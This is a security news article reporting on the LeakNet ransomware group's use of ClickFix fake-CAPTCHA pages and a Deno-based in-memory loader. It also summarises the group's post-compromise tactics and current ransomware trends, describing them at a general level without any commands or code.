Cybersecurity researchers have identified a new attack technique used by the ransomware group LeakNet that combines social engineering with a memory based malware loader. The group is now leveraging the ClickFix tactic through compromised websites to gain initial access to victim systems.
According to analysis published by ReliaQuest, the campaign represents a strategic change in how the ransomware operation infiltrates organizations.
Instead of relying on credentials obtained from initial access brokers, the attackers now use deceptive instructions that trick users into running malicious commands themselves.
ClickFix Social Engineering Technique
The ClickFix technique relies on manipulating users into executing commands under the belief they are fixing a technical issue.
In this campaign, attackers compromise legitimate websites and display a fake CAPTCHA verification page. The page instructs visitors to copy and paste a command into the Windows Run dialog.
The command executes msiexec.exe, which begins the malware infection chain.
This approach allows attackers to bypass traditional detection mechanisms because the action appears to be initiated by the user through legitimate Windows tools.
Deno Based Loader Executes Malware in Memory
Another distinctive feature of the attack is the use of a command and control loader built using the JavaScript runtime Deno.
The loader runs Base64 encoded JavaScript directly in system memory, significantly reducing the amount of malicious data written to disk.
Once executed, the loader performs several tasks:
- Collects information about the compromised system
- Connects to an external command and control server
- Downloads additional malicious payloads
- Executes further instructions in a continuous polling loop
Running the malware in memory helps the attackers evade many traditional security monitoring tools.
Shift Away From Initial Access Brokers
Researchers say the adoption of ClickFix gives the ransomware group greater operational flexibility.
Previously, attackers often relied on initial access brokers, third parties that sell compromised credentials to criminal groups. By moving away from that model, LeakNet can operate more quickly and at a lower cost.
Additionally, the use of compromised websites instead of attacker owned infrastructure makes network detection more difficult.
Microsoft Teams Phishing Observed in Similar Intrusion
In a separate investigation, analysts also detected a phishing attempt delivered through Microsoft Teams that led to the execution of a similar Deno based loader.
While the incident has not been formally attributed, researchers believe it may represent an expansion of LeakNet’s access methods or adoption of the technique by other cybercriminal groups.
Post Compromise Activities
Once attackers establish access, LeakNet follows a consistent attack sequence.
The operation typically begins with DLL side loading, allowing a malicious dynamic link library to run through a legitimate application.
After gaining control, the attackers perform several actions:
- Lateral movement using PsExec
- Credential enumeration using the Windows command klist
- Data exfiltration to cloud storage
- Final deployment of ransomware encryption
To transfer stolen data, attackers use cloud infrastructure such as Amazon S3 buckets. This tactic blends malicious activity with normal cloud traffic, reducing the likelihood of detection.
LeakNet Activity and Targeting
The LeakNet ransomware operation first appeared in November 2024. The group presents itself as a “digital watchdog,” claiming to support transparency and internet freedom.
However, threat intelligence company Dragos reported that the group has targeted industrial sector organizations.
Ransomware Landscape Continues to Evolve
Recent threat intelligence from Google highlights the continued activity of major ransomware groups.
The ransomware brands responsible for the highest number of claimed victims on data leak sites include:
- Qilin
- Akira
- Cl0p
- Play
- SafePay
- INC Ransom
- Lynx
- RansomHub
- DragonForce
- Sinobi
Security analysts noted that approximately 77%of ransomware incidents now involve data theft, an increase from about 57% in 2024.
Additionally, many attacks begin with the exploitation of vulnerabilities in common network devices such as VPN gateways and firewalls.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
